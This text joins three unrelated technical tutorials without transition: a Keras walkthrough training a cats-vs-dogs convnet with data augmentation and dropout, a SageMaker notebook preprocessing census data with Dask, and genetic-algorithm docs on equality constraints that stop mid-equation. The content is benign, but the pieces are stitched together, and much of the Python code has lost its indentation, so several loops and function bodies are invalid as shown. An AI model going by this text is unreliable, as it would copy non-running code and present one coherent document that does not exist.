The cats vs. dogs dataset that we will use isn't packaged with Keras. It was made available by Kaggle.com as part of a computer vision
competition in late 2013, back when convnets weren't quite mainstream. You can download the original dataset at:
`https://www.kaggle.com/c/dogs-vs-cats/data` (you will need to create a Kaggle account if you don't already have one -- don't worry, the
process is painless).
The pictures are medium-resolution color JPEGs. They look like this:

Unsurprisingly, the cats vs. dogs Kaggle competition in 2013 was won by entrants who used convnets. The best entries could achieve up to
95% accuracy. In our own example, we will get fairly close to this accuracy (in the next section), even though we will be training our
models on less than 10% of the data that was available to the competitors.
This original dataset contains 25,000 images of dogs and cats (12,500 from each class) and is 543MB large (compressed). After downloading
and uncompressing it, we will create a new dataset containing three subsets: a training set with 1000 samples of each class, a validation
set with 500 samples of each class, and finally a test set with 500 samples of each class.
Here are a few lines of code to do this:
```
import os, shutil
# The path to the directory where the original
# dataset was uncompressed
original_dataset_dir = '/Users/fchollet/Downloads/kaggle_original_data'
# The directory where we will
# store our smaller dataset
base_dir = '/Users/fchollet/Downloads/cats_and_dogs_small'
os.mkdir(base_dir)
# Directories for our training,
# validation and test splits
train_dir = os.path.join(base_dir, 'train')
os.mkdir(train_dir)
validation_dir = os.path.join(base_dir, 'validation')
os.mkdir(validation_dir)
test_dir = os.path.join(base_dir, 'test')
os.mkdir(test_dir)
# Directory with our training cat pictures
train_cats_dir = os.path.join(train_dir, 'cats')
os.mkdir(train_cats_dir)
# Directory with our training dog pictures
train_dogs_dir = os.path.join(train_dir, 'dogs')
os.mkdir(train_dogs_dir)
# Directory with our validation cat pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
os.mkdir(validation_cats_dir)
# Directory with our validation dog pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
os.mkdir(validation_dogs_dir)
# Directory with our test cat pictures
test_cats_dir = os.path.join(test_dir, 'cats')
os.mkdir(test_cats_dir)
# Directory with our test dog pictures
test_dogs_dir = os.path.join(test_dir, 'dogs')
os.mkdir(test_dogs_dir)
# Copy first 1000 cat images to train_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 cat images to validation_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 cat images to test_cats_dir
fnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_cats_dir, fname)
shutil.copyfile(src, dst)
# Copy first 1000 dog images to train_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_dogs_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 dog images to validation_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_dogs_dir, fname)
shutil.copyfile(src, dst)
# Copy next 500 dog images to test_dogs_dir
fnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_dogs_dir, fname)
shutil.copyfile(src, dst)
```
As a sanity check, let's count how many pictures we have in each split (train/validation/test):
```
print('total training cat images:', len(os.listdir(train_cats_dir)))
print('total training dog images:', len(os.listdir(train_dogs_dir)))
print('total validation cat images:', len(os.listdir(validation_cats_dir)))
print('total validation dog images:', len(os.listdir(validation_dogs_dir)))
print('total test cat images:', len(os.listdir(test_cats_dir)))
print('total test dog images:', len(os.listdir(test_dogs_dir)))
```
So we have indeed 2000 training images, and then 1000 validation images and 1000 test images. In each split, there is the same number of
samples from each class: this is a balanced binary classification problem, which means that classification accuracy will be an appropriate
measure of success.
## Building our network
We've already built a small convnet for MNIST in the previous example, so you should be familiar with them. We will reuse the same
general structure: our convnet will be a stack of alternated `Conv2D` (with `relu` activation) and `MaxPooling2D` layers.
However, since we are dealing with bigger images and a more complex problem, we will make our network accordingly larger: it will have one
more `Conv2D` + `MaxPooling2D` stage. This serves both to augment the capacity of the network, and to further reduce the size of the
feature maps, so that they aren't overly large when we reach the `Flatten` layer. Here, since we start from inputs of size 150x150 (a
somewhat arbitrary choice), we end up with feature maps of size 7x7 right before the `Flatten` layer.
Note that the depth of the feature maps is progressively increasing in the network (from 32 to 128), while the size of the feature maps is
decreasing (from 148x148 to 7x7). This is a pattern that you will see in almost all convnets.
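The size progression can be verified with a couple of lines (a sketch assuming 'valid' 3x3 convolutions with stride 1 and non-overlapping 2x2 max-pooling, matching the architecture built below):

```python
def conv_out(size, kernel=3):   # 'valid' padding, stride 1
    return size - kernel + 1

def pool_out(size, pool=2):     # non-overlapping max pooling
    return size // pool

size = 150
for _ in range(4):              # four Conv2D + MaxPooling2D stages
    size = pool_out(conv_out(size))
print(size)  # 7
```

Tracing it through: 150 → 148 → 74 → 72 → 36 → 34 → 17 → 15 → 7, so the `Flatten` layer indeed receives 7x7 feature maps.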
Since we are attacking a binary classification problem, we are ending the network with a single unit (a `Dense` layer of size 1) and a
`sigmoid` activation. This unit will encode the probability that the network is looking at one class or the other.
```
from keras import layers
from keras import models
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu',
input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
```
Let's take a look at how the dimensions of the feature maps change with every successive layer:
```
model.summary()
```
For our compilation step, we'll go with the `RMSprop` optimizer as usual. Since we ended our network with a single sigmoid unit, we will
use binary crossentropy as our loss (as a reminder, check out the table in Chapter 4, section 5 for a cheatsheet on what loss function to
use in various situations).
```
from keras import optimizers
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['acc'])
```
## Data preprocessing
As you already know by now, data should be formatted into appropriately pre-processed floating point tensors before being fed into our
network. Currently, our data sits on a drive as JPEG files, so the steps for getting it into our network are roughly:
* Read the picture files.
* Decode the JPEG content to RGB grids of pixels.
* Convert these into floating point tensors.
* Rescale the pixel values (between 0 and 255) to the [0, 1] interval (as you know, neural networks prefer to deal with small input values).
It may seem a bit daunting, but thankfully Keras has utilities to take care of these steps automatically. Keras has a module with image
processing helper tools, located at `keras.preprocessing.image`. In particular, it contains the class `ImageDataGenerator`, which allows us to
quickly set up Python generators that can automatically turn image files on disk into batches of pre-processed tensors. This is what we
will use here.
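Conceptually, the per-image preprocessing boils down to something like this NumPy sketch (`ImageDataGenerator` handles the decoding, rescaling, and batching for us; the random array here merely stands in for decoded JPEG pixels):

```python
import numpy as np

def to_model_input(img_uint8):
    """Convert one decoded RGB image (H, W, 3) of uint8 pixels into a
    float32 tensor rescaled from [0, 255] to the [0, 1] interval."""
    return img_uint8.astype('float32') / 255.0

# stand-in for a batch of 20 decoded 150x150 RGB images
raw = np.random.randint(0, 256, size=(20, 150, 150, 3), dtype=np.uint8)
batch = np.stack([to_model_input(img) for img in raw])
print(batch.shape, batch.dtype)
```

The resulting `(20, 150, 150, 3)` float32 batch is exactly the tensor shape the generator below will yield.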
```
from keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1./255)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=20,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode='binary')
```
Let's take a look at the output of one of these generators: it yields batches of 150x150 RGB images (shape `(20, 150, 150, 3)`) and binary
labels (shape `(20,)`). 20 is the number of samples in each batch (the batch size). Note that the generator yields these batches
indefinitely: it just loops endlessly over the images present in the target folder. For this reason, we need to `break` the iteration loop
at some point.
```
for data_batch, labels_batch in train_generator:
print('data batch shape:', data_batch.shape)
print('labels batch shape:', labels_batch.shape)
break
```
Let's fit our model to the data using the generator. We do it using the `fit_generator` method, the equivalent of `fit` for data generators
like ours. It expects as first argument a Python generator that will yield batches of inputs and targets indefinitely, like ours does.
Because the data is being generated endlessly, the fitting process needs to know how many batches to draw from the generator before
declaring an epoch over. This is the role of the `steps_per_epoch` argument: after having drawn `steps_per_epoch` batches from the
generator, i.e. after having run for `steps_per_epoch` gradient descent steps, the fitting process will go to the next epoch. In our case,
batches are 20-sample large, so it will take 100 batches until we see our target of 2000 samples.
When using `fit_generator`, one may pass a `validation_data` argument, much like with the `fit` method. Importantly, this argument is
allowed to be a data generator itself, but it could be a tuple of Numpy arrays as well. If you pass a generator as `validation_data`, then
this generator is expected to yield batches of validation data endlessly, and thus you should also specify the `validation_steps` argument,
which tells the process how many batches to draw from the validation generator for evaluation.
```
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50)
```
It is good practice to always save your models after training:
```
model.save('cats_and_dogs_small_1.h5')
```
Let's plot the loss and accuracy of the model over the training and validation data during training:
```
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
These plots are characteristic of overfitting. Our training accuracy increases linearly over time, until it reaches nearly 100%, while our
validation accuracy stalls at 70-72%. Our validation loss reaches its minimum after only five epochs then stalls, while the training loss
keeps decreasing linearly until it reaches nearly 0.
Because we only have relatively few training samples (2000), overfitting is going to be our number one concern. You already know about a
number of techniques that can help mitigate overfitting, such as dropout and weight decay (L2 regularization). We are now going to
introduce a new one, specific to computer vision, and used almost universally when processing images with deep learning models: *data
augmentation*.
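As a quick refresher on one of those techniques, here is a minimal NumPy sketch of inverted dropout, which is conceptually what the Keras `Dropout` layer applies at training time (a simplified illustration, not Keras's actual implementation):

```python
import numpy as np

def dropout(x, rate=0.5, training=True, rng=None):
    """Inverted dropout: at training time, zero out a fraction `rate`
    of units and scale the survivors by 1/(1 - rate) so the expected
    activation is unchanged; at test time, pass inputs through as-is."""
    if not training or rate == 0.0:
        return x
    rng = rng or np.random.default_rng(0)
    mask = (rng.random(x.shape) >= rate) / (1.0 - rate)
    return x * mask

x = np.ones((1000, 512))
out = dropout(x, rate=0.5)
print(out.mean())  # close to 1.0: the expected activation is preserved
```

The rescaling is what lets the same network run unmodified at inference time, with dropout simply switched off.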
## Using data augmentation
Overfitting is caused by having too few samples to learn from, rendering us unable to train a model able to generalize to new data.
Given infinite data, our model would be exposed to every possible aspect of the data distribution at hand: we would never overfit. Data
augmentation takes the approach of generating more training data from existing training samples, by "augmenting" the samples via a number
of random transformations that yield believable-looking images. The goal is that at training time, our model would never see the exact same
picture twice. This helps the model get exposed to more aspects of the data and generalize better.
In Keras, this can be done by configuring a number of random transformations to be performed on the images read by our `ImageDataGenerator`
instance. Let's get started with an example:
```
datagen = ImageDataGenerator(
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
```
These are just a few of the options available (for more, see the Keras documentation). Let's quickly go over what we just wrote:
* `rotation_range` is a value in degrees (0-180), a range within which to randomly rotate pictures.
* `width_shift` and `height_shift` are ranges (as a fraction of total width or height) within which to randomly translate pictures
vertically or horizontally.
* `shear_range` is for randomly applying shearing transformations.
* `zoom_range` is for randomly zooming inside pictures.
* `horizontal_flip` is for randomly flipping half of the images horizontally -- relevant when there are no assumptions of horizontal
asymmetry (e.g. real-world pictures).
* `fill_mode` is the strategy used for filling in newly created pixels, which can appear after a rotation or a width/height shift.
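Under the hood, a transformation like `horizontal_flip` is just an array operation on the image tensor. A minimal NumPy sketch, independent of Keras (the toy image values are arbitrary):

```python
import numpy as np

# A toy 4x4 RGB "image" with shape (height, width, channels)
img = np.arange(4 * 4 * 3).reshape(4, 4, 3)

# A horizontal flip mirrors the image along its width axis
flipped = img[:, ::-1, :]

# Flipping twice recovers the original image
restored = flipped[:, ::-1, :]
print(np.array_equal(img, restored))  # True
```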
Let's take a look at our augmented images:
```
# This is the module with image preprocessing utilities
from keras.preprocessing import image
fnames = [os.path.join(train_cats_dir, fname) for fname in os.listdir(train_cats_dir)]
# We pick one image to "augment"
img_path = fnames[3]
# Read the image and resize it
img = image.load_img(img_path, target_size=(150, 150))
# Convert it to a Numpy array with shape (150, 150, 3)
x = image.img_to_array(img)
# Reshape it to (1, 150, 150, 3)
x = x.reshape((1,) + x.shape)
# The .flow() command below generates batches of randomly transformed images.
# It will loop indefinitely, so we need to `break` the loop at some point!
i = 0
for batch in datagen.flow(x, batch_size=1):
plt.figure(i)
imgplot = plt.imshow(image.array_to_img(batch[0]))
i += 1
if i % 4 == 0:
break
plt.show()
```
If we train a new network using this data augmentation configuration, our network will never see the same input twice. However, the inputs
that it sees are still heavily intercorrelated, since they come from a small number of original images -- we cannot produce new information,
we can only remix existing information. As such, this might not be quite enough to completely get rid of overfitting. To further fight
overfitting, we will also add a Dropout layer to our model, right before the densely-connected classifier:
```
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu',
input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['acc'])
```
Let's train our network using data augmentation and dropout:
```
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,)
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=32,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=32,
class_mode='binary')
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50)
```
Let's save our model -- we will be using it in the section on convnet visualization.
```
model.save('cats_and_dogs_small_2.h5')
```
Let's plot our results again:
```
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
Thanks to data augmentation and dropout, we are no longer overfitting: the training curves are rather closely tracking the validation
curves. We are now able to reach an accuracy of 82%, a 15% relative improvement over the non-regularized model.
By leveraging regularization techniques even further and by tuning the network's parameters (such as the number of filters per convolution
layer, or the number of layers in the network), we may be able to get an even better accuracy, likely up to 86-87%. However, it would prove
very difficult to go any higher just by training our own convnet from scratch, simply because we have so little data to work with. As a
next step to improve our accuracy on this problem, we will have to leverage a pre-trained model, which will be the focus of the next two
sections.
# Feature transformation with Amazon SageMaker Processing and Dask
Typically a machine learning (ML) process consists of a few steps: first, gathering data with various ETL jobs; then pre-processing the data; featurizing the dataset by incorporating standard techniques or prior knowledge; and finally training an ML model using an algorithm.
Often, distributed data processing frameworks such as Dask are used to pre-process data sets in order to prepare them for training. In this notebook we'll use Amazon SageMaker Processing, and leverage the power of Dask in a managed SageMaker environment to run our preprocessing workload.
### What is Dask Distributed?
Dask.distributed is a lightweight, open-source library for distributed computing in Python. It is a centrally managed, distributed, dynamic task scheduler. Dask has three main components:
**dask-scheduler process:** coordinates the actions of several workers. The scheduler is asynchronous and event-driven, simultaneously responding to requests for computation from multiple clients and tracking the progress of multiple workers.
**dask-worker processes:** which are spread across multiple machines and serve the concurrent requests of several clients.
**dask-client process:** which is the primary entry point for users of dask.distributed.
<img src="https://docs.dask.org/en/latest/_images/dask-overview.svg">
source: https://docs.dask.org/en/latest/
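To get a feel for this architecture, here is a minimal local sketch (assuming `dask.distributed` is installed; the in-process local cluster stands in for the multi-machine setup described above):

```python
from dask.distributed import Client, LocalCluster

# A scheduler plus two workers, all running locally in this process
cluster = LocalCluster(n_workers=2, threads_per_worker=1)
client = Client(cluster)

# The client submits work to the scheduler, which farms it out to workers
future = client.submit(sum, range(10))
result = future.result()
print(result)  # 45

client.close()
cluster.close()
```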
## Contents
1. [Objective](#Objective:-predict-the-age-of-an-Abalone-from-its-physical-measurement)
1. [Setup](#Setup)
1. [Using Amazon SageMaker Processing to execute a Dask Job](#Using-Amazon-SageMaker-Processing-to-execute-a-Dask-Job)
1. [Downloading dataset and uploading to S3](#Downloading-dataset-and-uploading-to-S3)
1. [Build a Dask container for running the preprocessing job](#Build-a-Dask-container-for-running-the-preprocessing-job)
1. [Run the preprocessing job using Amazon SageMaker Processing](#Run-the-preprocessing-job-using-Amazon-SageMaker-Processing)
1. [Inspect the preprocessed dataset](#Inspect-the-preprocessed-dataset)
## Setup
Let's start by specifying:
* The S3 bucket and prefixes that you use for training and model data. Use the default bucket specified by the Amazon SageMaker session.
* The IAM role ARN used to give processing and training access to the dataset.
```
from time import gmtime, strftime
import sagemaker
sagemaker_session = sagemaker.Session()
role = sagemaker.get_execution_role()
bucket = sagemaker_session.default_bucket()
timestamp_prefix = strftime("%Y-%m-%d-%H-%M-%S", gmtime())
prefix = "sagemaker/dask-preprocess-demo"
input_prefix = prefix + "/input/raw/census"
input_preprocessed_prefix = prefix + "/input/preprocessed/census"
model_prefix = prefix + "/model"
```
## Using Amazon SageMaker Processing to execute a Dask job
### Downloading dataset and uploading to Amazon Simple Storage Service (Amazon S3)
The dataset used here is the Census-Income KDD Dataset. The first steps are to select features, clean the data, and turn the data into features that the training algorithm can use to train a binary classification model, which can then be used to predict whether rows representing census responders have an income greater than or less than $50,000. In this example, we will use Dask distributed to preprocess and transform the data to make it ready for the training process. In the next section, you download from the bucket below then upload to your own bucket so that Amazon SageMaker can access the dataset.
```
import boto3
import pandas as pd
s3 = boto3.client('s3')
region = sagemaker_session.boto_region_name
input_data = 's3://sagemaker-sample-data-{}/processing/census/census-income.csv'.format(region)
!aws s3 cp $input_data .
# Uploading the training data to S3
sagemaker_session.upload_data(path='census-income.csv', bucket=bucket, key_prefix=input_prefix)
```
### Build a dask container for running the preprocessing job
An example Dask container is included in the `./container` directory of this example. The container handles the bootstrapping of the Dask scheduler and mapping each instance to a Dask worker. At a high level the container provides:
* A set of default worker/scheduler configurations
* A bootstrapping script for configuring and starting up scheduler/worker nodes
* Starting dask cluster from all the workers including the scheduler node
After the container build and push process is complete, use the Amazon SageMaker Python SDK to submit a managed, distributed dask application that performs our dataset preprocessing.
### Build the example Dask container.
```
%cd container
!docker build -t sagemaker-dask-example .
%cd ../
```
### Create an Amazon Elastic Container Registry (Amazon ECR) repository for the Dask container and push the image.
```
import boto3
account_id = boto3.client('sts').get_caller_identity().get('Account')
region = boto3.session.Session().region_name
ecr_repository = 'sagemaker-dask-example'
tag = ':latest'
uri_suffix = 'amazonaws.com'
if region in ['cn-north-1', 'cn-northwest-1']:
uri_suffix = 'amazonaws.com.cn'
dask_repository_uri = '{}.dkr.ecr.{}.{}/{}'.format(account_id, region, uri_suffix, ecr_repository + tag)
# Create ECR repository and push docker image
!$(aws ecr get-login --region $region --registry-ids $account_id --no-include-email)
!aws ecr create-repository --repository-name $ecr_repository
!docker tag {ecr_repository + tag} $dask_repository_uri
!docker push $dask_repository_uri
```
### Run the preprocessing job using Amazon SageMaker Processing on Dask Cluster
Next, use the Amazon SageMaker Python SDK to submit a processing job. Use the custom Dask container that was just built, and a scikit-learn script for preprocessing in the job configuration.
#### Create the Dask preprocessing script.
```
%%writefile preprocess.py
from __future__ import print_function, unicode_literals
import argparse
import json
import logging
import os
import sys
import time
import warnings
import boto3
import numpy as np
import pandas as pd
from tornado import gen
import dask.dataframe as dd
import joblib
from dask.distributed import Client
from sklearn.compose import make_column_transformer
from sklearn.exceptions import DataConversionWarning
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import (
KBinsDiscretizer,
LabelBinarizer,
OneHotEncoder,
PolynomialFeatures,
StandardScaler,
)
warnings.filterwarnings(action="ignore", category=DataConversionWarning)
attempts_counter = 3
attempts = 0
def upload_objects(bucket, prefix, local_path):
try:
bucket_name = bucket # s3 bucket name
root_path = local_path # local folder for upload
s3_bucket = s3_client.Bucket(bucket_name)
for path, subdirs, files in os.walk(root_path):
for file in files:
s3_bucket.upload_file(
os.path.join(path, file), "{}/output/{}".format(prefix, file)
)
except Exception as err:
logging.exception(err)
def print_shape(df):
negative_examples, positive_examples = np.bincount(df["income"])
print(
"Data shape: {}, {} positive examples, {} negative examples".format(
df.shape, positive_examples, negative_examples
)
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--train-test-split-ratio", type=float, default=0.3)
args, _ = parser.parse_known_args()
# Get processor scrip arguments
args_iter = iter(sys.argv[1:])
script_args = dict(zip(args_iter, args_iter))
scheduler_ip = sys.argv[-1]
# S3 client
s3_region = script_args["s3_region"]
s3_client = boto3.resource("s3", s3_region)
print(f'Using the {s3_region} region')
# Start the Dask cluster client
try:
client = Client("tcp://{ip}:8786".format(ip=scheduler_ip))
logging.info("Printing cluster information: {}".format(client))
except Exception as err:
logging.exception(err)
columns = [
"age",
"education",
"major industry code",
"class of worker",
"num persons worked for employer",
"capital gains",
"capital losses",
"dividends from stocks",
"income",
]
class_labels = [" - 50000.", " 50000+."]
input_data_path = "s3://{}".format(os.path.join(
script_args["s3_input_bucket"],
script_args["s3_input_key_prefix"],
"census-income.csv",
))
# Creating the necessary paths to save the output files
if not os.path.exists("/opt/ml/processing/train"):
os.makedirs("/opt/ml/processing/train")
if not os.path.exists("/opt/ml/processing/test"):
os.makedirs("/opt/ml/processing/test")
print("Reading input data from {}".format(input_data_path))
df = pd.read_csv(input_data_path)
df = pd.DataFrame(data=df, columns=columns)
df.dropna(inplace=True)
df.drop_duplicates(inplace=True)
df.replace(class_labels, [0, 1], inplace=True)
negative_examples, positive_examples = np.bincount(df["income"])
print(
"Data after cleaning: {}, {} positive examples, {} negative examples".format(
df.shape, positive_examples, negative_examples
)
)
split_ratio = args.train_test_split_ratio
print("Splitting data into train and test sets with ratio {}".format(split_ratio))
X_train, X_test, y_train, y_test = train_test_split(
df.drop("income", axis=1), df["income"], test_size=split_ratio, random_state=0
)
preprocess = make_column_transformer(
(
KBinsDiscretizer(encode="onehot-dense", n_bins=2),
["age", "num persons worked for employer"],
),
(
StandardScaler(),
["capital gains", "capital losses", "dividends from stocks"],
),
(
OneHotEncoder(sparse=False),
["education", "major industry code", "class of worker"],
),
)
print("Running preprocessing and feature engineering transformations in Dask")
with joblib.parallel_backend("dask"):
train_features = preprocess.fit_transform(X_train)
test_features = preprocess.transform(X_test)
print("Train data shape after preprocessing: {}".format(train_features.shape))
print("Test data shape after preprocessing: {}".format(test_features.shape))
train_features_output_path = os.path.join(
"/opt/ml/processing/train", "train_features.csv"
)
train_labels_output_path = os.path.join(
"/opt/ml/processing/train", "train_labels.csv"
)
test_features_output_path = os.path.join(
"/opt/ml/processing/test", "test_features.csv"
)
test_labels_output_path = os.path.join("/opt/ml/processing/test", "test_labels.csv")
print("Saving training features to {}".format(train_features_output_path))
pd.DataFrame(train_features).to_csv(
train_features_output_path, header=False, index=False
)
print("Saving test features to {}".format(test_features_output_path))
pd.DataFrame(test_features).to_csv(
test_features_output_path, header=False, index=False
)
print("Saving training labels to {}".format(train_labels_output_path))
y_train.to_csv(train_labels_output_path, header=False, index=False)
print("Saving test labels to {}".format(test_labels_output_path))
y_test.to_csv(test_labels_output_path, header=False, index=False)
upload_objects(
script_args["s3_output_bucket"],
script_args["s3_output_key_prefix"],
"/opt/ml/processing/train/",
)
upload_objects(
script_args["s3_output_bucket"],
script_args["s3_output_key_prefix"],
"/opt/ml/processing/test/",
)
# wait for the file creation
while attempts < attempts_counter:
if os.path.exists(train_features_output_path) and os.path.isfile(
train_features_output_path
):
try:
# Calculate the processed dataset baseline statistics on the Dask cluster
dask_df = dd.read_csv(train_features_output_path)
dask_df = client.persist(dask_df)
baseline = dask_df.describe().compute()
print(baseline)
break
except Exception:
pass
# Count the failed attempt and wait before retrying
attempts += 1
time.sleep(2)
if attempts == attempts_counter:
raise Exception(
"Output file {} couldn't be found".format(train_features_output_path)
)
print(client)
sys.exit(os.EX_OK)
```
Run a processing job using the Docker image and preprocessing script you just created. When invoking the `dask_processor.run()` function, pass the Amazon S3 input and output paths as arguments that are required by our preprocessing script to determine input and output locations in Amazon S3. Here, you also specify the number of instances and instance type that will be used for the distributed Dask job.
```
from sagemaker.processing import ProcessingInput, ScriptProcessor
dask_processor = ScriptProcessor(
base_job_name="dask-preprocessor",
image_uri=dask_repository_uri,
command=["/opt/program/bootstrap.py"],
role=role,
instance_count=2,
instance_type="ml.m5.large",
max_runtime_in_seconds=1200,
)
dask_processor.run(
code="preprocess.py",
arguments=[
"s3_input_bucket",
bucket,
"s3_input_key_prefix",
input_prefix,
"s3_output_bucket",
bucket,
"s3_output_key_prefix",
input_preprocessed_prefix,
"s3_region",
region
],
logs=True
)
```
#### Inspect the preprocessed dataset
Take a look at a few rows of the transformed dataset to make sure the preprocessing was successful.
```
print('Top 5 rows from s3://{}/{}/train/'.format(bucket, input_preprocessed_prefix))
!aws s3 cp --quiet s3://$bucket/$input_preprocessed_prefix/output/train_features.csv - | head -n5
```
Now, you can use the output files of the transformation process as input to a training job and train a classification model.
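For instance, a minimal sketch of such a training step using scikit-learn locally (the synthetic arrays below are stand-ins for `train_features.csv` / `train_labels.csv`, which you would load from the S3 output prefix instead):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(seed=0)

# Synthetic stand-ins for the preprocessed features and labels; in practice,
# load train_features.csv and train_labels.csv produced by the processing job
X_train = rng.normal(size=(200, 10))
y_train = (X_train[:, 0] > 0).astype(int)

clf = LogisticRegression(max_iter=1000).fit(X_train, y_train)
acc = clf.score(X_train, y_train)
print(f"Training accuracy: {acc:.2f}")
```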
## Constraint Handling
### Inequality Constraints
**If somebody is interested in implementing or willing to make contributions regarding constraint handling of inequality constraints, please let us know.
The G problem suite is already available to experiment with different algorithms. So far, mostly parameter-less constraint handling is used for our algorithms.**
### Equality Constraints
We have received a couple of questions about how equality constraints should be handled in a genetic algorithm. In general, functions without any smoothness are challenging for genetic algorithms to handle. An equality constraint is basically an extreme case, where the constraint violation is 0 at exactly one point and otherwise 1.
Let us consider the following constraint $g(x)$ where $x$ represents a variable:
$g(x): x = 5$
An equality constraint can be expressed by an inequality constraint:
$g(x): |x - 5| \leq 0$
or
$g(x): (x-5)^2 \leq 0$
However, all of the constraints above are very strict and make **most of the search space infeasible**. Without providing more information to the algorithm, those constraints are very difficult to satisfy.
For this reason, the constraint can be smoothed by adding an epsilon to it and, therefore, having two inequality constraints:
$g'(x): 5 - \epsilon \leq x \leq 5 + \epsilon$
Also, it can be simply expressed in one inequality constraint by:
$g'(x): (x-5)^2 - \hat{\epsilon} \leq 0$
Depending on the $\epsilon$ the solutions will be more or less close to the desired value. However, the genetic algorithm does not know anything about the problem itself which makes it difficult to handle and focus the search in the infeasible space.
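To see how the choice of $\epsilon$ controls the size of the feasible region, here is a quick numerical sketch (the sampling bounds and $\epsilon$ values are illustrative):

```python
import numpy as np

rng = np.random.default_rng(seed=0)
x = rng.uniform(-10, 10, size=100_000)  # uniform samples of the variable

# Fraction of samples satisfying g'(x): (x - 5)^2 - eps <= 0
for eps in [0.0, 0.01, 0.1, 1.0]:
    frac = np.mean((x - 5) ** 2 - eps <= 0)
    print(f"eps={eps}: {frac:.2%} of samples feasible")
```

With $\epsilon = 0$ essentially no random sample is feasible, while larger values open up an interval around $x = 5$ of width $2\sqrt{\epsilon}$.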
**Constraint Handling Through Repair**
A simple approach is to handle constraints through a repair function. This is only possible if the equation of the constraint is known. The repair makes sure every solution that is evaluated is in fact feasible. Let us consider the following example where
the equality constraints need to consider more than one variable:
\begin{align}
\begin{split}
\min \;\; & f_1(x) = (x_1^2 + x_2^2) \\
\max \;\; & f_2(x) = -(x_1-1)^2 - x_2^2 \\[1mm]
\text{s.t.} \;\; & g_1(x_1, x_3) : x_1 + x_3 = 2\\[2mm]
& -2 \leq x_1 \leq 2 \\
